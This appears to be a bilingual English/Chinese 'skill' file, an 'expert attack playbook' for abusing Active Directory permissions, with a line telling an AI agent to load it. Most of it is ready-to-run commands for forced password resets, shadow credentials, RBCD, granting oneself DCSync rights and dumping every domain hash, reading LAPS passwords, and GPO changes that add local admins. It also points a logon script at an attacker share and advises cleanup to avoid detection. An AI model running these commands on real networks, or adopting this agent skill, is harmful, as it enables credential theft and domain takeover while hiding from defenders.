Back to Details

active-directory-acl-abuse

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: AD ACL Abuse — Expert Attack Playbook

SKILL: AD ACL Abuse — 专家级攻击手册

AI LOAD INSTRUCTION: Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns.
AI加载说明:专家级AD ACL滥用技术,覆盖BloodHound枚举、危险ACE(GenericAll、WriteDACL、WriteOwner等)、DCSync、影子凭证、定向kerberoasting、组操作、LAPS和GPO滥用。基础模型不包含复杂ACL链式利用和Cypher查询模式的相关知识。

0. RELATED ROUTING

0. 相关关联技能

Before going deep, consider loading:
  • active-directory-kerberos-attacks for Kerberos attacks often chained with ACL abuse
  • active-directory-certificate-services for certificate-based attacks after ACL exploitation
  • ntlm-relay-coercion for relay attacks that can set ACLs (LDAP relay)
  • windows-lateral-movement after gaining elevated AD access
深入学习前,可考虑加载以下内容:
  • active-directory-kerberos-attacks 可学习常与ACL滥用链式组合的Kerberos攻击方法
  • active-directory-certificate-services 可学习ACL利用后的基于证书的攻击方法
  • ntlm-relay-coercion 可学习可设置ACL的中继攻击(LDAP中继)
  • windows-lateral-movement 可学习获取AD高权限后的横向移动方法

Advanced Reference

高级参考

Also load BLOODHOUND_PATHS.md when you need:
  • Common BloodHound attack paths with Cypher queries
  • Custom Neo4j queries for finding complex chains
  • Data collection and ingestion tips
当你需要以下内容时,也可加载BLOODHOUND_PATHS.md
  • 附带Cypher查询的常见BloodHound攻击路径
  • 用于查找复杂利用链的自定义Neo4j查询
  • 数据收集与导入技巧

1. BLOODHOUND ENUMERATION

1. BLOODHOUND 枚举

Data Collection

数据收集

bash
undefined
bash
undefined

SharpHound (from Windows, domain-joined)

SharpHound (从已加入域的Windows设备运行)

SharpHound.exe -c all --outputdirectory C:\temp --zipfilename bh.zip
SharpHound.exe -c all --outputdirectory C:\temp --zipfilename bh.zip

bloodhound-python (from Linux)

bloodhound-python (从Linux设备运行)

bloodhound-python -d domain.com -u user -p password -c all -dc DC01.domain.com -ns DC_IP
bloodhound-python -d domain.com -u user -p password -c all -dc DC01.domain.com -ns DC_IP

Specific collection methods

特定收集方法

SharpHound.exe -c DCOnly # Fastest — only DC queries SharpHound.exe -c Session # Session data only (run periodically) SharpHound.exe -c All,GPOLocalGroup # Include GPO analysis
undefined
SharpHound.exe -c DCOnly # 速度最快 — 仅查询域控制器 SharpHound.exe -c Session # 仅收集会话数据(可定期运行) SharpHound.exe -c All,GPOLocalGroup # 包含GPO分析
undefined

Key BloodHound Queries (Built-in)

BloodHound核心内置查询

  • "Find all Domain Admins"
  • "Shortest Paths to Domain Admins from Owned Principals"
  • "Find Principals with DCSync Rights"
  • "Shortest Paths to Unconstrained Delegation Systems"
  • "Find computers where Domain Users are Local Admin"
  • "查找所有域管理员"
  • "从已控主体到域管理员的最短路径"
  • "查找拥有DCSync权限的主体"
  • "到无约束委派系统的最短路径"
  • "查找域用户为本地管理员的计算机"

2. DANGEROUS ACE TYPES

2. 危险ACE类型

ACEEffect on UsersEffect on GroupsEffect on Computers
GenericAllChange password, set SPN, modify attributesAdd membersRBCD, LAPS read, all attributes
GenericWriteSet SPN, modify attributes, shadow credsAdd membersRBCD, shadow credentials
WriteDACLGrant yourself any permissionSameSame
WriteOwnerTake ownership → then WriteDACLSameSame
ForceChangePasswordReset password without knowing oldN/AN/A
AddMemberN/AAdd self/others to groupN/A
AllExtendedRightsForce change password, read LAPSN/ARead LAPS, BitLocker keys
ReadLAPSPasswordN/AN/ARead local admin password
WriteSPNSet SPN → targeted kerberoastN/AN/A
ACE对用户的影响对用户组的影响对计算机的影响
GenericAll修改密码、设置SPN、修改属性添加成员RBCD、读取LAPS、所有属性操作
GenericWrite设置SPN、修改属性、添加影子凭证添加成员RBCD、添加影子凭证
WriteDACL给自身授予任意权限同上同上
WriteOwner接管所有权 → 后续可操作WriteDACL同上同上
ForceChangePassword无需知晓旧密码即可重置密码
AddMember将自身/其他账号加入组
AllExtendedRights强制修改密码、读取LAPS读取LAPS、BitLocker密钥
ReadLAPSPassword读取本地管理员密码
WriteSPN设置SPN → 定向kerberoast攻击

3. ACE-SPECIFIC EXPLOITATION

3. 针对特定ACE的利用

GenericAll on User

用户对象的GenericAll权限

powershell
undefined
powershell
undefined

Option 1: Force change password

Option 1: 强制修改密码

net user targetuser NewP@ss123 /domain
net user targetuser NewP@ss123 /domain

Option 2: Targeted Kerberoasting

Option 2: 定向Kerberoasting攻击

Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/svc'}
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/svc'}

→ Kerberoast, then clear SPN

→ 执行Kerberoast攻击,之后清除SPN

Option 3: Shadow Credentials

Option 3: 影子凭证攻击

Whisker.exe add /target:targetuser /domain:domain.com /dc:DC01
Whisker.exe add /target:targetuser /domain:domain.com /dc:DC01

Option 4: Set logon script

Option 4: 设置登录脚本

Set-DomainObject -Identity targetuser -Set @{scriptpath='\attacker\share\evil.ps1'}
undefined
Set-DomainObject -Identity targetuser -Set @{scriptpath='\attacker\share\evil.ps1'}
undefined

GenericAll / GenericWrite on Computer

计算机对象的GenericAll / GenericWrite权限

bash
undefined
bash
undefined

RBCD attack

RBCD攻击

rbcd.py -delegate-from 'CONTROLLED$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC
rbcd.py -delegate-from 'CONTROLLED$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC

Shadow Credentials on computer

针对计算机的影子凭证攻击

pywhisker.py -d domain.com -u user -p pass --target 'TARGET$' --action add --dc-ip DC
undefined
pywhisker.py -d domain.com -u user -p pass --target 'TARGET$' --action add --dc-ip DC
undefined

WriteDACL

WriteDACL权限

powershell
undefined
powershell
undefined

Grant DCSync rights to yourself

给自身授予DCSync权限

Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity lowpriv -Rights DCSync
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity lowpriv -Rights DCSync

Impacket

Impacket实现

dacledit.py -action write -rights DCSync -principal lowpriv -target-dn "DC=domain,DC=com" DOMAIN/lowpriv:pass -dc-ip DC
undefined
dacledit.py -action write -rights DCSync -principal lowpriv -target-dn "DC=domain,DC=com" DOMAIN/lowpriv:pass -dc-ip DC
undefined

WriteOwner

WriteOwner权限

powershell
undefined
powershell
undefined

Step 1: Take ownership

步骤1: 接管所有权

Set-DomainObjectOwner -Identity targetuser -OwnerIdentity lowpriv
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity lowpriv

Step 2: Grant WriteDACL to yourself (as owner)

步骤2: 作为所有者给自身授予WriteDACL权限

Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity lowpriv -Rights All
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity lowpriv -Rights All

Step 3: Now exploit as GenericAll

步骤3: 后续可按照GenericAll权限的方法进行利用

undefined
undefined

ForceChangePassword

ForceChangePassword权限

bash
undefined
bash
undefined

Impacket

Impacket实现

rpcclient -U 'DOMAIN/attacker%pass' DC01 -c "setuserinfo2 targetuser 23 'NewP@ss123!'"
rpcclient -U 'DOMAIN/attacker%pass' DC01 -c "setuserinfo2 targetuser 23 'NewP@ss123!'"

PowerView

PowerView实现

Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force)
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force)

net rpc

net rpc实现

net rpc password targetuser 'NewP@ss123!' -U DOMAIN/attacker%pass -S DC01
undefined
net rpc password targetuser 'NewP@ss123!' -U DOMAIN/attacker%pass -S DC01
undefined

AddMember to Group

用户组的AddMember权限

powershell
undefined
powershell
undefined

Add self to privileged group

将自身加入高权限组

Add-DomainGroupMember -Identity "Domain Admins" -Members lowpriv
Add-DomainGroupMember -Identity "Domain Admins" -Members lowpriv

Impacket

Impacket实现

net rpc group addmem "Domain Admins" lowpriv -U DOMAIN/attacker%pass -S DC01

---
net rpc group addmem "Domain Admins" lowpriv -U DOMAIN/attacker%pass -S DC01

---

4. DCSYNC ATTACK

4. DCSYNC攻击

Prerequisites

前置条件

The principal needs both of these replication rights on the domain object:
  • DS-Replication-Get-Changes
    (GUID: 
    1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
    )
  • DS-Replication-Get-Changes-All
    (GUID: 
    1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
    )
操作主体需要同时拥有域对象的以下两个复制权限:
  • DS-Replication-Get-Changes
    (GUID: 
    1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
    )
  • DS-Replication-Get-Changes-All
    (GUID: 
    1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
    )

Execution

攻击执行

bash
undefined
bash
undefined

Impacket — dump all hashes

Impacket — 导出所有哈希

secretsdump.py DOMAIN/user:password@DC01 -just-dc
secretsdump.py DOMAIN/user:password@DC01 -just-dc

Specific account only

仅导出指定账号的哈希

secretsdump.py DOMAIN/user:password@DC01 -just-dc-user krbtgt
secretsdump.py DOMAIN/user:password@DC01 -just-dc-user krbtgt

Mimikatz

Mimikatz实现

lsadump::dcsync /domain:domain.com /user:krbtgt lsadump::dcsync /domain:domain.com /all /csv
lsadump::dcsync /domain:domain.com /user:krbtgt lsadump::dcsync /domain:domain.com /all /csv

Impacket with Kerberos auth

带Kerberos认证的Impacket实现

export KRB5CCNAME=admin.ccache secretsdump.py -k -no-pass DC01.domain.com -just-dc
undefined
export KRB5CCNAME=admin.ccache secretsdump.py -k -no-pass DC01.domain.com -just-dc
undefined

Who Has DCSync by Default?

默认拥有DCSync权限的主体

  • Domain Admins
  • Enterprise Admins
  • Domain Controllers group
  • BUILTIN\Administrators
    (on domain object)
  • 域管理员(Domain Admins)
  • 企业管理员(Enterprise Admins)
  • 域控制器组(Domain Controllers group)
  • BUILTIN\Administrators
    (域对象层面)

5. SHADOW CREDENTIALS

5. 影子凭证攻击

Attack Flow

攻击流程

Write 
msDS-KeyCredentialLink
on target → generate certificate → authenticate via PKINIT.
bash
undefined
给目标对象写入
msDS-KeyCredentialLink
属性 → 生成证书 → 通过PKINIT进行身份认证。
bash
undefined

pyWhisker (Linux)

pyWhisker (Linux实现)

pywhisker.py -d domain.com -u attacker -p pass --target victim --action add --dc-ip DC01
pywhisker.py -d domain.com -u attacker -p pass --target victim --action add --dc-ip DC01

Output: DeviceID and PFX file

输出: DeviceID和PFX文件

Authenticate with certificate

使用证书进行认证

gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass RANDOM_PASS domain.com/victim victim.ccache export KRB5CCNAME=victim.ccache
gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass RANDOM_PASS domain.com/victim victim.ccache export KRB5CCNAME=victim.ccache

Extract NT hash from TGT (for pass-the-hash)

从TGT中提取NT哈希(用于哈希传递攻击)

getnthash.py -key AS_REP_KEY domain.com/victim

```powershell
getnthash.py -key AS_REP_KEY domain.com/victim

```powershell

Whisker (Windows)

Whisker (Windows实现)

Whisker.exe add /target:victim /domain:domain.com /dc:DC01.domain.com
Whisker.exe add /target:victim /domain:domain.com /dc:DC01.domain.com

→ Provides Rubeus command to get TGT

→ 会输出用于获取TGT的Rubeus命令

Rubeus.exe asktgt /user:victim /certificate:CERT_B64 /password:PASS /ptt

**Cleanup**: Remove the added key credential to avoid detection.

---
Rubeus.exe asktgt /user:victim /certificate:CERT_B64 /password:PASS /ptt

**清理操作**:删除添加的密钥凭证避免被检测。

---

6. LAPS PASSWORD READING

6. LAPS密码读取

powershell
undefined
powershell
undefined

PowerView

PowerView实现

Get-DomainComputer -Identity TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
Get-DomainComputer -Identity TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime

AD Module

AD模块实现

Get-ADComputer -Identity TARGET -Properties ms-Mcs-AdmPwd | Select-Object ms-Mcs-AdmPwd
Get-ADComputer -Identity TARGET -Properties ms-Mcs-AdmPwd | Select-Object ms-Mcs-AdmPwd

LAPS v2 (Windows LAPS)

LAPS v2 (Windows LAPS)实现

Get-LapsADPassword -Identity TARGET -AsPlainText
Get-LapsADPassword -Identity TARGET -AsPlainText

CrackMapExec

CrackMapExec实现

crackmapexec ldap DC01 -u user -p pass --module laps

---
crackmapexec ldap DC01 -u user -p pass --module laps

---

7. GPO ABUSE

7. GPO滥用

Identify Writable GPOs

识别可写GPO

powershell
undefined
powershell
undefined

PowerView — find GPOs where you have write access

PowerView — 查找你拥有写入权限的GPO

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { ($.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite') -and ($.SecurityIdentifier -match 'YOUR_SID') }
undefined
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { ($.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite') -and ($.SecurityIdentifier -match 'YOUR_SID') }
undefined

Exploit via SharpGPOAbuse

通过SharpGPOAbuse进行利用

cmd
undefined
cmd
undefined

Add local admin via GPO

通过GPO添加本地管理员

SharpGPOAbuse.exe --AddLocalAdmin --UserAccount lowpriv --GPOName "Vulnerable GPO"
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount lowpriv --GPOName "Vulnerable GPO"

Add scheduled task via GPO

通过GPO添加计划任务

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\admin --Command "cmd.exe" --Arguments "/c net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\admin --Command "cmd.exe" --Arguments "/c net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"

Add startup script

添加启动脚本

SharpGPOAbuse.exe --AddComputerScript --ScriptName "evil.bat" --ScriptContents "net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"

```bash
SharpGPOAbuse.exe --AddComputerScript --ScriptName "evil.bat" --ScriptContents "net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"

```bash

pyGPOAbuse (Linux)

pyGPOAbuse (Linux实现)

pygpoabuse.py DOMAIN/user:pass -gpo-id "GPO_GUID" -command "net localgroup administrators lowpriv /add" -dc-ip DC01

---
pygpoabuse.py DOMAIN/user:pass -gpo-id "GPO_GUID" -command "net localgroup administrators lowpriv /add" -dc-ip DC01

---

8. ACL ATTACK DECISION TREE

8. ACL攻击决策树

Have domain user access — want to escalate via ACL
├── Run BloodHound → analyze shortest paths to DA
│   └── Upload data → "Shortest Paths to Domain Admins from Owned Principals"
├── Direct ACL on user object?
│   ├── GenericAll → force password change, shadow creds, or targeted kerberoast (§3)
│   ├── GenericWrite → shadow credentials or set SPN (§3/§5)
│   ├── ForceChangePassword → reset password directly (§3)
│   ├── WriteDACL → grant yourself GenericAll, then exploit (§3)
│   └── WriteOwner → take ownership → WriteDACL → GenericAll (§3)
├── ACL on group?
│   ├── AddMember / GenericAll → add self to privileged group (§3)
│   └── WriteDACL → grant AddMember, then add self
├── ACL on computer object?
│   ├── GenericAll/GenericWrite → RBCD attack (§3)
│   ├── AllExtendedRights → read LAPS password (§6)
│   └── GenericWrite → shadow credentials on machine (§5)
├── ACL on domain object?
│   ├── WriteDACL → grant DCSync rights to self (§4)
│   └── Replication rights already? → DCSync directly (§4)
├── ACL on GPO linked to privileged OU?
│   └── Write access → add admin / scheduled task via GPO (§7)
└── Complex multi-hop chain?
    └── Load BLOODHOUND_PATHS.md for Cypher queries and chain analysis
拥有域用户权限 — 希望通过ACL进行权限提升
├── 运行BloodHound → 分析到域管理员的最短路径
│   └── 上传数据 → 执行查询"从已控主体到域管理员的最短路径"
├── 用户对象存在可利用ACL?
│   ├── GenericAll → 强制修改密码、影子凭证或者定向kerberoast(第3节)
│   ├── GenericWrite → 影子凭证或者设置SPN(第3/5节)
│   ├── ForceChangePassword → 直接重置密码(第3节)
│   ├── WriteDACL → 给自身授予GenericAll权限后进行利用(第3节)
│   └── WriteOwner → 接管所有权 → 设置WriteDACL → 获取GenericAll权限(第3节)
├── 用户组存在可利用ACL?
│   ├── AddMember / GenericAll → 将自身加入高权限组(第3节)
│   └── WriteDACL → 授予自身AddMember权限后加入组
├── 计算机对象存在可利用ACL?
│   ├── GenericAll/GenericWrite → RBCD攻击(第3节)
│   ├── AllExtendedRights → 读取LAPS密码(第6节)
│   └── GenericWrite → 针对设备的影子凭证攻击(第5节)
├── 域对象存在可利用ACL?
│   ├── WriteDACL → 给自身授予DCSync权限(第4节)
│   └── 已拥有复制权限?→ 直接执行DCSync攻击(第4节)
├── 绑定到高权限OU的GPO存在可利用ACL?
│   └── 拥有写入权限 → 通过GPO添加管理员/计划任务(第7节)
└── 存在复杂多跳利用链?
    └── 加载BLOODHOUND_PATHS.md获取Cypher查询和链分析方法